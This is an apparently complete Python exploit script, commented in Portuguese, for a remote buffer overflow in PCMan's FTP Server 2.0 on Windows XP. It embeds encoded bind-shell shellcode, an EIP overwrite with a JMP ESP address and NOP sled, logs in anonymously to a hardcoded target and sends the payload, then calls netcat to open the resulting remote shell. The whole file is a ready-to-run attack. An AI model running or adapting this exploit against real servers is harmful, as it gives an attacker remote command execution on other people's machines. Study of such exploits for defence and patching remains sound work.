#!/usr/bin/python
# -*- coding: utf-8 -*-
################################################################
#
# Programa Vulneravel: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Data: 2013/6/26
# Verificação:Não verificado
# Autor do Exploit: Luís Reis(12829),Paulo Viegas(12834)
# website do vendedor: http://pcman.openfoundry.org/
# Link do download da aplicação vulnerável: https://files.secureserver.net/1sMltFOsytirTG
# Versão: 2.0
# Testado em: Windows XP Profissional SP2 English
# Bad caracters: \x00\x0a
# 
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 00A31BD0
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
#################################################################



import socket #biblioteca para comunicação
import os #biblioteca do sistema operativo 
import time #biblioteca do para ir buscar a função sleep


#./msfpayload  windows/shell_bind_tcp LPORT=443 R | msfencode -b '\x00\x0a' -t c
shellcode="\xd9\xe8\xb8\xe8\x08\x08\x64\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"+\
"\x56\x83\xed\xfc\x31\x45\x14\x03\x45\xfc\xea\xfd\x98\x14\x63"+\
"\xfd\x60\xe4\x14\x77\x85\xd5\x06\xe3\xcd\x47\x97\x67\x83\x6b"+\
"\x5c\x25\x30\xf8\x10\xe2\x37\x49\x9e\xd4\x76\x4a\x2e\xd9\xd5"+\
"\x88\x30\xa5\x27\xdc\x92\x94\xe7\x11\xd2\xd1\x1a\xd9\x86\x8a"+\
"\x51\x4b\x37\xbe\x24\x57\x36\x10\x23\xe7\x40\x15\xf4\x93\xfa"+\
"\x14\x25\x0b\x70\x5e\xdd\x20\xde\x7f\xdc\xe5\x3c\x43\x97\x82"+\
"\xf7\x37\x26\x42\xc6\xb8\x18\xaa\x85\x86\x94\x27\xd7\xcf\x13"+\
"\xd7\xa2\x3b\x60\x6a\xb5\xff\x1a\xb0\x30\xe2\xbd\x33\xe2\xc6"+\
"\x3c\x90\x75\x8c\x33\x5d\xf1\xca\x57\x60\xd6\x60\x63\xe9\xd9"+\
"\xa6\xe5\xa9\xfd\x62\xad\x6a\x9f\x33\x0b\xdd\xa0\x24\xf3\x82"+\
"\x04\x2e\x16\xd7\x3f\x6d\x7f\x14\x72\x8e\x7f\x32\x05\xfd\x4d"+\
"\x9d\xbd\x69\xfe\x56\x18\x6d\x01\x4d\xdc\xe1\xfc\x6d\x1d\x2b"+\
"\x3b\x39\x4d\x43\xea\x41\x06\x93\x13\x94\x89\xc3\xbb\x46\x6a"+\
"\xb4\x7b\x36\x02\xde\x73\x69\x32\xe1\x59\x1c\x74\x2f\xb9\x4d"+\
"\x13\x52\x3d\x70\x58\xdb\xdb\x18\x8e\x8a\x74\xb4\x6c\xe9\x4c"+\
"\x23\x8e\xdb\xe0\xfc\x18\x53\xef\x3a\x26\x64\x25\x69\x8b\xcc"+\
"\xae\xf9\xc7\xc8\xcf\xfe\xcd\x78\x99\xc7\x86\xf3\xf7\x8a\x37"+\
"\x03\xd2\x7c\xdb\x96\xb9\x7c\x92\x8a\x15\x2b\xf3\x7d\x6c\xb9"+\
"\xe9\x24\xc6\xdf\xf3\xb1\x21\x5b\x28\x02\xaf\x62\xbd\x3e\x8b"+\
"\x74\x7b\xbe\x97\x20\xd3\xe9\x41\x9e\x95\x43\x20\x48\x4c\x3f"+\
"\xea\x1c\x09\x73\x2d\x5a\x16\x5e\xdb\x82\xa7\x37\x9a\xbd\x08"+\
"\xd0\x2a\xc6\x74\x40\xd4\x1d\x3d\x70\x9f\x3f\x14\x19\x46\xaa"+\
"\x24\x44\x79\x01\x6a\x71\xfa\xa3\x13\x86\xe2\xc6\x16\xc2\xa4"+\
"\x3b\x6b\x5b\x41\x3b\xd8\x5c\x40";

junk="\x41"*2011 #foi removido o comando STOR e o espaço foi acrescentado ao lixo o numero de caracteres respectivos
eip="\x65\x82\xA5\x7C" #endereço onde se encontra o JMP ESP da Shell 32 ---> 7CA58265
nops="\x90"*20 #nops para preencher os espaços em branco e funciona como filtro 

rest="\xcc"*(3000-len(junk+eip+nops+shellcode))#calculo do resto do Junk a seguir ao shellcode
lixo=junk+eip+nops+shellcode+rest

print "Valor do resto a seguir a shell",len(rest)
print 'Valor total',len(lixo),'bytes\r\n'

print "Connecting\r\n"
##############################
#Conexão ao computador vitima
#Por FTP 
#Envio:
#USER:anonymous
#PASS:test
#EXPLOIT:lixo
##############################
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.2.144',21))
s.recv(1024)
print "A enviar User e Password\r\n"
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
print "A enviar o exploit"
s.send(lixo + '\r\n')
s.close()
print "Exploit enviado\r\n"
###############################################################
#Commando para por o Atacante à escuta 
#para que a vitima se ligue a ele pela porta 443
#Commando
#--->nc ip_da_vitima e porta utilizado na criação do shellcode
###############################################################
print "A entrar no Sistema\r\n"
time.sleep(1)
time.sleep(4)
print "System Hacked :)\r\n"
cmd='nc 192.168.2.144 443'
os.system(cmd)



